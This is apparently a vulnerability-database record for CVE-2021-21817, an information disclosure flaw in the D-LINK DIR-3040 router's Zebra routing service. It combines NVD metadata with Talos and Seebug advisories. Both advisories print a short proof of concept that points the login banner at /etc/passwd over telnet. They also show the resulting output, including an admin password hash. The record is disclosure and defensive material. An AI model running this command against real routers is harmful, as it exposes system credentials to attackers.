An information disclosure vulnerability exists in the Zebra IP Routing Manager functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send a sequence of requests to trigger this vulnerability.
{"id": "CVE-2021-21817", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-21817", "description": "An information disclosure vulnerability exists in the Zebra IP Routing Manager functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send a sequence of requests to trigger this vulnerability.", "published": "2021-07-16T11:15:00", "modified": "2022-04-28T17:15:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21817", "reporter": "talos-cna@cisco.com", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2021-1282"], "cvelist": ["CVE-2021-21817"], "immutableFields": [], "lastseen": "2022-04-28T19:32:47", "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "seebug", "idList": ["SSV:99312"]}, {"type": "talos", "idList": ["TALOS-2021-1282"]}], "rev": 4}, "score": {"value": 2.6, "vector": "NONE"}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/hasdid/status/1418054954867208194", "text": "/hashtag/SANSNewsBites?src=hashtag_click /hashtag/CyberSecurity?src=hashtag_click /hashtag/Automated?src=hashtag_click | DIR-3040 :: Rev. Ax :: FW v1.13B03 :: CVE-2021-21816 / CVE-2021-21817 / CVE-2021-21818 / CVE-2021-21819 / CVE-2021-21820 -Multiple Vulnerabilities https://t.co/ewq6PEwkfC?amp=1"}, {"link": "https://twitter.com/ehsantarrar1/status/1416950108382498816", "text": "D-LINK 1/2\nMultiple vulnerabilities (CVE-2021-21816, CVE-2021-21817, CVE-2021-21818, CVE-2021-21820) have been found in the D-LINK DIR-3040 wireless router. These vulnerabilities could allow an attacker to carry out a variety of malicious actions."}, {"link": "https://twitter.com/ehsantarrar1/status/1416950108382498816", "text": "D-LINK 1/2\nMultiple vulnerabilities (CVE-2021-21816, CVE-2021-21817, CVE-2021-21818, CVE-2021-21820) have been found in the D-LINK DIR-3040 wireless router. These vulnerabilities could allow an attacker to carry out a variety of malicious actions."}, {"link": "https://twitter.com/TWCERTCC/status/1419594535085117440", "text": "DIR-3040 :: Rev. Ax :: FW v1.13B03 :: CVE-2021-21816 / CVE-2021-21817 / CVE-2021-21818 / CVE-2021-21819 / CVE-2021-21820 -Multiple Vulnerabilities\nhttps://t.co/tLBw2PKBDc?amp=1\n------\n\u570b\u5167\u7db2\u8def\u7523\u54c1\u88fd\u9020\u5927\u5ee0\u4fee\u5fa9\u8def\u7531\u5668\u5bc6\u78bc\u786c\u7de8\u5beb\u66a8\u591a\u500bRCE\u56b4\u91cd\u6f0f\u6d1e\nview more\uff1ahttps://t.co/wqt7ryAayR?amp=1"}], "modified": "2021-07-23T07:50:01"}, "backreferences": {"references": [{"type": "seebug", "idList": ["SSV:99312"]}, {"type": "talos", "idList": ["TALOS-2021-1282"]}]}, "exploitation": null, "vulnersScore": 2.6}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": "Talos", "cvss": {"3": {"vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "score": 7.5}}}, "cpe": ["cpe:/o:dlink:dir-3040_firmware:1.13b03"], "cpe23": ["cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "affectedSoftware": [{"cpeName": "dlink:dir-3040_firmware", "version": "1.13b03", "operator": "eq", "name": "dlink dir-3040 firmware"}], "affectedConfiguration": [{"name": "dlink dir-3040", "cpeName": "dlink:dir-3040", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:*", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dlink:dir-3040:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2021-1282", "name": "https://talosintelligence.com/vulnerability_reports/TALOS-2021-1282", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"talos": [{"lastseen": "2022-01-26T11:42:07", "description": "### Summary\n\nAn information disclosure vulnerability exists in the Zebra IP Routing Manager functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send a sequence of requests to trigger this vulnerability.\n\n### Tested Versions\n\nD-LINK DIR-3040 1.13B03\n\n### Product URLs\n\n<https://us.dlink.com/en/products/dir-3040-smart-ac3000-high-power-wi-fi-tri-band-gigabit-router>\n\n### CVSSv3 Score\n\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n\n### CWE\n\nCWE-200 - Information Exposure\n\n### Details\n\nThe DIR-3040 is an AC3000-based wireless internet router.\n\nZebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols.\n\nThe DIR-3040 runs this service by default on TCP port 2601 and can be accessed by anyone on the network. This service also uses a configuration file containing a hard-coded password that is discussed in TALOS-2021-1283.\n\nHowever, another feature provided by the Zebra service is to change the login banner \u201cMessage of the Day\u201d contents based on an arbitrary file on disk:\n \n \n Router# configure terminal\n Router(config)# \n access-list Add an access list entry\n banner Set banner string\n debug Debugging functions (see also 'undebug')\n default Configure defaults of settings\n enable Modify enable password parameters\n end End current mode and change to enable mode.\n exit Exit current mode and down to previous mode\n fpm fpm connection remote ip and port\n help Description of the interactive help system\n hostname Set system's network name\n interface Select an interface to configure\n ip IP information\n ipv6 IPv6 information\n line Configure a terminal line\n list Print command list\n log Logging control\n no Negate a command or set its defaults\n password Assign the terminal connection password\n quit Exit current mode and down to previous mode\n route-map Create route-map or enter route-map command mode\n router-id Manually set the router-id\n service Set up miscellaneous service\n show Show running system information\n table Configure target kernel routing table\n vrf Enable a VRF\n write Write running configuration to memory, network, or terminal\n Router(config)# banner motd \n default Default string\n file Banner from a file\n Router(config)# banner motd file \n [FILE] Filename\n <cr> \n \n\nA client can set this file to something sensitive such as `/etc/passwd` to read its contents.\n\n### Exploit Proof of Concept\n \n \n Router(config)# banner motd file /etc/passwd\n Router(config)# exit\n Router# exit\n Connection closed by foreign host.\n $ telnet 192.168.100.1 2601\n Trying 192.168.100.1...\n Connected to 192.168.100.1.\n Escape character is '^]'.\n admin:$1$aCkh/7OI$Z6d8WJ4iEIMKopn4HUptg.:0:0:Adminstrator:/:/bin/sh\n nobody:x:1:500:Linux User,,,:/home/nobody:/bin/sh\n root:x:2:600:Linux User,,,:/home/root:/bin/sh\n \n User Access Verification\n \n Password: \n \n\n### Timeline\n\n2021-04-28 - Vendor disclosure \n2021-05-12 - Vendor acknowledged \n2021-06-08 - Vendor provided patch for Talos to test \n2021-06-09 - Talos provided feedback on patch \n2021-06-23 - Talos follow up with vendor \n2021-07-13 - Vendor patched \n2021-07-15 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-07-15T00:00:00", "type": "talos", "title": "D-LINK DIR-3040 Zebra IP routing manager information disclosure vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21817"], "modified": "2021-07-15T00:00:00", "id": "TALOS-2021-1282", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1282", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2021-07-23T15:50:02", "description": "The DIR-3040 is an AC3000-based wireless internet router.\n\nZebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols.\n\nThe DIR-3040 runs this service by default on TCP port 2601 and can be accessed by anyone on the network. This service also uses a configuration file containing a hard-coded password that is discussed in TALOS-2021-1283.\n\nHowever, another feature provided by the Zebra service is to change the login banner \u201cMessage of the Day\u201d contents based on an arbitrary file on disk:\n\n```\nRouter# configure terminal\nRouter(config)# \n access-list Add an access list entry\n banner Set banner string\n debug Debugging functions (see also 'undebug')\n default Configure defaults of settings\n enable Modify enable password parameters\n end End current mode and change to enable mode.\n exit Exit current mode and down to previous mode\n fpm fpm connection remote ip and port\n help Description of the interactive help system\n hostname Set system's network name\n interface Select an interface to configure\n ip IP information\n ipv6 IPv6 information\n line Configure a terminal line\n list Print command list\n log Logging control\n no Negate a command or set its defaults\n password Assign the terminal connection password\n quit Exit current mode and down to previous mode\n route-map Create route-map or enter route-map command mode\n router-id Manually set the router-id\n service Set up miscellaneous service\n show Show running system information\n table Configure target kernel routing table\n vrf Enable a VRF\n write Write running configuration to memory, network, or terminal\nRouter(config)# banner motd \n default Default string\n file Banner from a file\nRouter(config)# banner motd file \n [FILE] Filename\n <cr> \n```\n\nA client can set this file to something sensitive such as `/etc/passwd` to read its contents.\n\nExploit Proof of Concept\n\n```\nRouter(config)# banner motd file /etc/passwd\nRouter(config)# exit\nRouter# exit\nConnection closed by foreign host.\n$ telnet 192.168.100.1 2601\nTrying 192.168.100.1...\nConnected to 192.168.100.1.\nEscape character is '^]'.\nadmin:$1$aCkh/7OI$Z6d8WJ4iEIMKopn4HUptg.:0:0:Adminstrator:/:/bin/sh\nnobody:x:1:500:Linux User,,,:/home/nobody:/bin/sh\nroot:x:2:600:Linux User,,,:/home/root:/bin/sh\n\nUser Access Verification\n\nPassword: \n```", "cvss3": {}, "published": "2021-07-22T00:00:00", "type": "seebug", "title": "D-LINK DIR-3040 Zebra IP \u8def\u7531\u7ba1\u7406\u5668\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e(CVE-2021-21817)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21817"], "modified": "2021-07-22T00:00:00", "id": "SSV:99312", "href": "https://www.seebug.org/vuldb/ssvid-99312", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
CVE-2021-21817
